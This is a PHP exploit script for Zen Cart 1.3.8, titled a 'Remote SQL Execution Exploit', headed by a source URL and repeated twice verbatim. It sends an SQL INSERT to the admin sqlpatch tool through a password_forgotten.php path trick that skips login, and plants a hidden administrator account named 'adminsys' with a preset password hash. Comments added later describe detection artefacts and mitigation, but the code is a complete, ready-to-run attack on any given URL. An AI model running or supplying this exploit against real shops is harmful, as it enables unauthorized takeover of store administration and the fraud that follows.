http://noscan.xp3.biz/zen.txt
#!/usr/bin/php
// Usage guard: the script expects the target site's base URL as its only
// argument; without it, print the banner and leave with exit status 1.
if ($argc < 2) {
    echo <<<'BANNER'

==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================
root@irvian ~# php zen.php http://target.com
==============================================

BANNER;
    exit(1);
}
function gets($url,$post=null) {
    // Thin libcurl wrapper: fetch $url (plain GET, or POST when a body is
    // given) and hand back the raw response body, or false if the transfer
    // failed.
    //
    // Reviewer notes: peer and host certificate checks are switched off, so
    // a TLS endpoint is talked to without any identity verification, and the
    // transfer timeout is 0 (libcurl's "never time out"). The user-agent is
    // read from $_SERVER['HTTP_USER_AGENT'], which is not normally present
    // for a CLI run — expect a notice and an empty UA header in that case.
    $options = [
        CURLOPT_URL            => $url,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_USERAGENT      => $_SERVER['HTTP_USER_AGENT'],
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_TIMEOUT        => 0,
    ];
    // Loose comparison kept on purpose: any value that == null (null, '',
    // [] …) leaves the request as a plain GET.
    if ($post != null) {
        $options[CURLOPT_POST]       = true;
        $options[CURLOPT_POSTFIELDS] = $post;
    }
    $handle = curl_init();
    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    curl_close($handle);
    return $body;
}
// Target base URL exactly as given on the command line (no validation).
$url = $argv[1];
// Statement the tool asks the remote site to run: it adds a row to Zen Cart's
// `admin` table with a fixed id, name, e-mail and a pre-computed password
// value. For defenders, an unexpected `admin` row with admin_id 56 /
// admin_name 'adminsys' is the artefact this leaves behind in the database.
$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
// The statement is POSTed to the admin SQL-patch tool. The trailing
// `/password_forgotten.php` path segment is part of the published request and
// presumably is what lets the call through without an admin login — confirm
// against the affected source. Mitigation: make sure the sqlpatch tool is not
// reachable without an authenticated admin session (or remove it from
// production installs). Detection: a POST to admin/sqlpatch.php with a
// `query_string=` body from a client that holds no admin session.
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";
$req = gets($form,"query_string=$enc");
// Success is judged solely by the tool's "1 statements processed" message in
// the response body; any other response (error page, empty body, false from
// curl) is reported as a failure.
if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}
#!/usr/bin/php
// Usage guard: the script expects the target site's base URL as its only
// argument; without it, print the banner and leave with exit status 1.
if ($argc < 2) {
    echo <<<'BANNER'

==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================
root@irvian ~# php zen.php http://target.com
==============================================

BANNER;
    exit(1);
}
function gets($url,$post=null) {
    // Thin libcurl wrapper: fetch $url (plain GET, or POST when a body is
    // given) and hand back the raw response body, or false if the transfer
    // failed.
    //
    // Reviewer notes: peer and host certificate checks are switched off, so
    // a TLS endpoint is talked to without any identity verification, and the
    // transfer timeout is 0 (libcurl's "never time out"). The user-agent is
    // read from $_SERVER['HTTP_USER_AGENT'], which is not normally present
    // for a CLI run — expect a notice and an empty UA header in that case.
    $options = [
        CURLOPT_URL            => $url,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_USERAGENT      => $_SERVER['HTTP_USER_AGENT'],
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_TIMEOUT        => 0,
    ];
    // Loose comparison kept on purpose: any value that == null (null, '',
    // [] …) leaves the request as a plain GET.
    if ($post != null) {
        $options[CURLOPT_POST]       = true;
        $options[CURLOPT_POSTFIELDS] = $post;
    }
    $handle = curl_init();
    curl_setopt_array($handle, $options);
    $body = curl_exec($handle);
    curl_close($handle);
    return $body;
}
// Target base URL exactly as given on the command line (no validation).
$url = $argv[1];
// Statement the tool asks the remote site to run: it adds a row to Zen Cart's
// `admin` table with a fixed id, name, e-mail and a pre-computed password
// value. For defenders, an unexpected `admin` row with admin_id 56 /
// admin_name 'adminsys' is the artefact this leaves behind in the database.
$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
// The statement is POSTed to the admin SQL-patch tool. The trailing
// `/password_forgotten.php` path segment is part of the published request and
// presumably is what lets the call through without an admin login — confirm
// against the affected source. Mitigation: make sure the sqlpatch tool is not
// reachable without an authenticated admin session (or remove it from
// production installs). Detection: a POST to admin/sqlpatch.php with a
// `query_string=` body from a client that holds no admin session.
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";
$req = gets($form,"query_string=$enc");
// Success is judged solely by the tool's "1 statements processed" message in
// the response body; any other response (error page, empty body, false from
// curl) is reported as a failure.
if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}